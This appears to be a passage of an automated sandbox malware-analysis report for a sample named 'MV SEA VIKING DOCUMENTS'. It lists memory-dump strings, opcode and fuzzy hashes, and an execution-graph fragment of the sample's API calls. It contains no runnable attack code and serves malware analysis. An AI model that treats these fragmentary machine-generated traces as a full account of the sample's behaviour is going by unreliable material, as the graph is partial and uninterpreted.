                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: $$@
                                                                                                                                                                                                                                • API String ID: 3446177414-1194432280
                                                                                                                                                                                                                                • Opcode ID: cbde2ba363ca61a2d49a7abb3d2d3696501fccdd2b44106d06a395b74e4f06ce
                                                                                                                                                                                                                                • Instruction ID: da4935f4cc0aaf74a59e1d141fc599c5e48e25d525aba0349102f2a9ead79db4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cbde2ba363ca61a2d49a7abb3d2d3696501fccdd2b44106d06a395b74e4f06ce
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0C8120B1D002699BDB31CF54CC44BDEB6B9AF09710F1141DAE90AB7290E771AE95CFA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • LdrpDynamicShimModule, xrefs: 1F23A7A5
                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 1F23A7AF
                                                                                                                                                                                                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 1F23A79F
                                                                                                                                                                                                                                • apphelp.dll, xrefs: 1F1F2382
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                • API String ID: 0-176724104
                                                                                                                                                                                                                                • Opcode ID: 43ee65d8693d92592b8370a3519770a2331c34ebb13967cff960dc2931e2defb
                                                                                                                                                                                                                                • Instruction ID: 834b14cd1d5202c56993b4d1ee0a2ea580dc078359faf17e3ba8a960db8ee0e2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 43ee65d8693d92592b8370a3519770a2331c34ebb13967cff960dc2931e2defb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 683128F9E00252EBE7108F19CCC8ADE77B5EB88714F2401A9E8016B650D771BD65CF41
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                                                • API String ID: 3446177414-3610490719
                                                                                                                                                                                                                                • Opcode ID: d7ea979a99ac4e98c5c8e8950cf0a7c2a9e726e36dd3d2f5217296e59364c512
                                                                                                                                                                                                                                • Instruction ID: e0990c4cc16c0b3a28db377c951d53798da9a1a5c6a1adc9e0b328ff9762ff10
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d7ea979a99ac4e98c5c8e8950cf0a7c2a9e726e36dd3d2f5217296e59364c512
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 96912371704B82EFC715CB24C8A4B6AB7E5FF94B00F110559F8418B685EB34F862DBA2
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                                                                                                                                                                • API String ID: 3446177414-2283098728
                                                                                                                                                                                                                                • Opcode ID: 167b8f0255fb4461d12ed63bd80a5ed81bfd249cd6c184b7df96fe242ff0361f
                                                                                                                                                                                                                                • Instruction ID: cdf6bb072b5b0b541e6b01395733f405b2560aa6558d08e83d4fa56f83214576
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 167b8f0255fb4461d12ed63bd80a5ed81bfd249cd6c184b7df96fe242ff0361f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 275120716107429FC321EF39CD94A5A77A2BB88310F94076DE4578B691E775B838CB82
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 1F2480E9
                                                                                                                                                                                                                                • Failed to reallocate the system dirs string !, xrefs: 1F2480E2
                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 1F2480F3
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                • API String ID: 3446177414-1783798831
                                                                                                                                                                                                                                • Opcode ID: b4e714a5d6e01b40aa4741662913722a7b3bac80fa0e19cac3a06156df45f3cc
                                                                                                                                                                                                                                • Instruction ID: 865795231f0845a49d977a54cd3e9a927b13890e793fc14ce0260b436dd1a888
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b4e714a5d6e01b40aa4741662913722a7b3bac80fa0e19cac3a06156df45f3cc
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D412BB6554751ABC322EF24CC44B8B3BE8EF84720F10492AF88997650EB75F824CF95
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • LdrpCheckRedirection, xrefs: 1F25450F
                                                                                                                                                                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 1F254519
                                                                                                                                                                                                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 1F254508
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                                                                • API String ID: 3446177414-3154609507
                                                                                                                                                                                                                                • Opcode ID: db892bb2840c64f89cb7c3ece09e938a54a80afc0127c10c687f8eba4edc7883
                                                                                                                                                                                                                                • Instruction ID: 4006888160f3b8d4619a3dbdd5c2f186836f861b0dc075077cc7bf0dd65cccf9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: db892bb2840c64f89cb7c3ece09e938a54a80afc0127c10c687f8eba4edc7883
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F941D1727543129BCB10CF68C864AD6F7E4EF88750B160699EC889B269E731FD00CB91
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: Wow64 Emulation Layer
                                                                                                                                                                                                                                • API String ID: 3446177414-921169906
                                                                                                                                                                                                                                • Opcode ID: afde31509bac6f6ca13e3a388b3c8ee8963b8185e3cc18fa5271b7f0da548c6d
                                                                                                                                                                                                                                • Instruction ID: ef93a35468ce564d643bf49ab077e9563c3e3db97b5bf350f7b31d053afb8635
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: afde31509bac6f6ca13e3a388b3c8ee8963b8185e3cc18fa5271b7f0da548c6d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F8212CBA60055DFFEB029AA08D89DFF7B7DEF4469AB040054FA11A2110E735AE21DB60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                                                                                                • Opcode ID: 55030412e14dffcf57e247749b31869f74c6b6710139252625f242d562205b5f
                                                                                                                                                                                                                                • Instruction ID: 644e111eb22b377488b405208518e316a85348544ae9718831dab6596f670ee0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 55030412e14dffcf57e247749b31869f74c6b6710139252625f242d562205b5f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F1712371E05629DFEF09CFA4C884ADDBBB9BF48314F25406AD906EB244E7B4A901CF54
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                                                                                                • Opcode ID: ff797e7580285c6194f1385540a5723d883f8901099ac6ef184673b1c41b5e7a
                                                                                                                                                                                                                                • Instruction ID: ef287b8b9f65667fa28bfbb6a83b0bdca4a67eb766a0412a2903849c32f84b2b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ff797e7580285c6194f1385540a5723d883f8901099ac6ef184673b1c41b5e7a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 58514835710613EFDB09CE28C8A5A59B7E5BF89310B2141ADD906DBB20EB72BC51CF80
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                                                                                                • Opcode ID: a5cd9a2e8d64e2d57a615831848cc41a360761e83ef408b03583256beca880f2
                                                                                                                                                                                                                                • Instruction ID: 683b37c36e259fd28714a5f4a4a225218f9f1d164de9a69d9fc868fe15efdaff
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a5cd9a2e8d64e2d57a615831848cc41a360761e83ef408b03583256beca880f2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8F512571E04219DFDF08CF95D844ADDBBB5BF88360F25816AE816BB290E7B5A901CF50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4281723722-0
                                                                                                                                                                                                                                • Opcode ID: aa42a2cd50bbba8a04bc975c5485d054284a4075f43ac8bb97f62ca66e42f3b8
                                                                                                                                                                                                                                • Instruction ID: 51b45a02d8ee7531190148f12085c7911c4999c4a98c1019fb7e7124aae73210
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aa42a2cd50bbba8a04bc975c5485d054284a4075f43ac8bb97f62ca66e42f3b8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A5313875E00268DFCF15DFA8D889A9DBBF0FB48720F20416AE811B7680D776A900CF50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                                • API String ID: 0-2766056989
                                                                                                                                                                                                                                • Opcode ID: 143d1439a85bd4dffb45aed724d7bd6a55f7e0f8c7729824adb7f40e42174a27
                                                                                                                                                                                                                                • Instruction ID: 6eb8c2d6e097907425c9808397ed9deba3b05253a70beb7ecbb094654f1c826b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 143d1439a85bd4dffb45aed724d7bd6a55f7e0f8c7729824adb7f40e42174a27
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8F3247B4D0036ADFDB25CF64C988BD9BBB4BF48304F0041E9E449AB241E7B56A94DF91
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • kLsE, xrefs: 1F1D05FE
                                                                                                                                                                                                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 1F1D0586
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                                                                                                • API String ID: 3446177414-2547482624
                                                                                                                                                                                                                                • Opcode ID: a11bf75cef139c195a65167248d683783404addfc77c4be07664650e84f14cb0
                                                                                                                                                                                                                                • Instruction ID: 10ba42a90c01b2566e811700a1b2b9b86e74220034286b8f26d38f03ccf82c47
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a11bf75cef139c195a65167248d683783404addfc77c4be07664650e84f14cb0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7751BC75A0074ADFC720DFA5C4886EAB7F8AF44340F10853EE99E87644E774A514CFA2
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: 0$0
                                                                                                                                                                                                                                • API String ID: 3446177414-203156872
                                                                                                                                                                                                                                • Opcode ID: b7524024b63e1f8beca46a1c18be1cbedd5042224d54b48a7ed8cab928821238
                                                                                                                                                                                                                                • Instruction ID: a37f5ed14d28357e14e0df765205b281fe252149e9dbb953c31d83359fd72621
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b7524024b63e1f8beca46a1c18be1cbedd5042224d54b48a7ed8cab928821238
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0D418DB1A087429FC300CF28C594A5ABBE4FF89314F454A6EF588DB701D771EA16CB86
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                Execution Coverage:2.9%
                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:1.3%
                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                Total number of Nodes:1218
                                                                                                                                                                                                                                Total number of Limit Nodes:139
82033->82034 82035 8884bc 82034->82035 82041 5462bc0 LdrInitializeThunk 82035->82041 82036 87b3af 82036->82026 82038 888a90 82036->82038 82039 888aaf 82038->82039 82040 8891e0 LdrLoadDll 82038->82040 82039->82030 82040->82039 82041->82036 82087 87bdb0 82042->82087 82044 87ccd7 82050 87ccf0 82044->82050 82100 873d70 82044->82100 82045 88a270 2 API calls 82047 87ccfe 82045->82047 82047->81906 82048 87ccea 82124 887430 82048->82124 82050->82045 82053 87863b 82051->82053 82052 87875b 82052->81910 82053->82052 82054 87d080 3 API calls 82053->82054 82055 87873c 82054->82055 82056 87876a 82055->82056 82057 878751 82055->82057 82058 888710 2 API calls 82055->82058 82056->81910 82157 875ea0 LdrLoadDll 82057->82157 82058->82057 82061 887f9c 82060->82061 82062 8891e0 LdrLoadDll 82061->82062 82063 87acb0 82062->82063 82063->81917 82063->81918 82063->81954 82065 87d3d0 2 API calls 82064->82065 82066 8875e2 82064->82066 82065->82066 82066->81934 82068 877298 82067->82068 82069 879b40 LdrLoadDll 82068->82069 82070 8772b3 82069->82070 82071 883e50 LdrLoadDll 82070->82071 82072 8772c3 82071->82072 82073 8772fd 82072->82073 82074 8772cc PostThreadMessageW 82072->82074 82073->81837 82074->82073 82075 8772e0 82074->82075 82076 8772ea PostThreadMessageW 82075->82076 82076->82073 82077->81921 82078->81929 82080 888290 2 API calls 82079->82080 82081 87aace 82080->82081 82081->81937 82082->81938 82083->81942 82084->81946 82085->81943 82086->81947 82088 87bde3 82087->82088 82129 87a150 82088->82129 82090 87bdf5 82133 87a2c0 82090->82133 82092 87be13 82093 87a2c0 LdrLoadDll 82092->82093 82094 87be29 82093->82094 82095 87d200 3 API calls 82094->82095 82096 87be4d 82095->82096 82097 87be54 82096->82097 82136 88a2b0 LdrLoadDll RtlAllocateHeap 82096->82136 82097->82044 82099 87be64 82099->82044 82101 873d96 82100->82101 82102 87b340 3 API calls 82101->82102 82104 873e61 82102->82104 82103 873e68 82103->82048 82104->82103 82137 88a2f0 82104->82137 82106 873ec9 82107 879e90 LdrLoadDll 
82106->82107 82108 873fd3 82107->82108 82109 879e90 LdrLoadDll 82108->82109 82110 873ff7 82109->82110 82141 87b400 82110->82141 82114 874083 82115 88a020 2 API calls 82114->82115 82116 874110 82115->82116 82117 88a020 2 API calls 82116->82117 82119 87412a 82117->82119 82118 8742a6 82118->82048 82119->82118 82120 879e90 LdrLoadDll 82119->82120 82121 87416a 82120->82121 82122 879d60 LdrLoadDll 82121->82122 82123 87420a 82122->82123 82123->82048 82125 883e50 LdrLoadDll 82124->82125 82127 887451 82125->82127 82126 887477 82126->82050 82127->82126 82128 887464 CreateThread 82127->82128 82128->82050 82130 87a177 82129->82130 82131 879e90 LdrLoadDll 82130->82131 82132 87a1b3 82131->82132 82132->82090 82134 879e90 LdrLoadDll 82133->82134 82135 87a2d9 82133->82135 82134->82135 82135->82092 82136->82099 82138 88a2fd 82137->82138 82139 883e50 LdrLoadDll 82138->82139 82140 88a310 82139->82140 82140->82106 82142 87b425 82141->82142 82150 888310 82142->82150 82145 8883a0 82146 8891e0 LdrLoadDll 82145->82146 82147 8883bc 82146->82147 82156 5462b00 LdrInitializeThunk 82147->82156 82148 8883db 82148->82114 82151 8891e0 LdrLoadDll 82150->82151 82152 88832c 82151->82152 82155 5462b80 LdrInitializeThunk 82152->82155 82153 87405c 82153->82114 82153->82145 82155->82153 82156->82148 82157->82052 82159 888117 82158->82159 82160 8891e0 LdrLoadDll 82159->82160 82161 88812c 82160->82161 82164 5462cf0 LdrInitializeThunk 82161->82164 82162 87d40e 82162->81837 82164->82162 82166 87bda5 82165->82166 82167 87bd40 82165->82167 82166->81970 82167->82166 82222 87d010 82167->82222 82169 87bd50 82170 883a50 8 API calls 82169->82170 82171 87bd61 82170->82171 82172 883a50 8 API calls 82171->82172 82173 87bd6c 82172->82173 82174 87bd7a 82173->82174 82230 87b7f0 82173->82230 82176 883a50 8 API calls 82174->82176 82177 87bd88 82176->82177 82178 883a50 8 API calls 82177->82178 82179 87bd93 82178->82179 82179->81970 82181 87cd40 82180->82181 82281 882d60 82181->82281 82183 87cd81 82319 881a50 82183->82319 
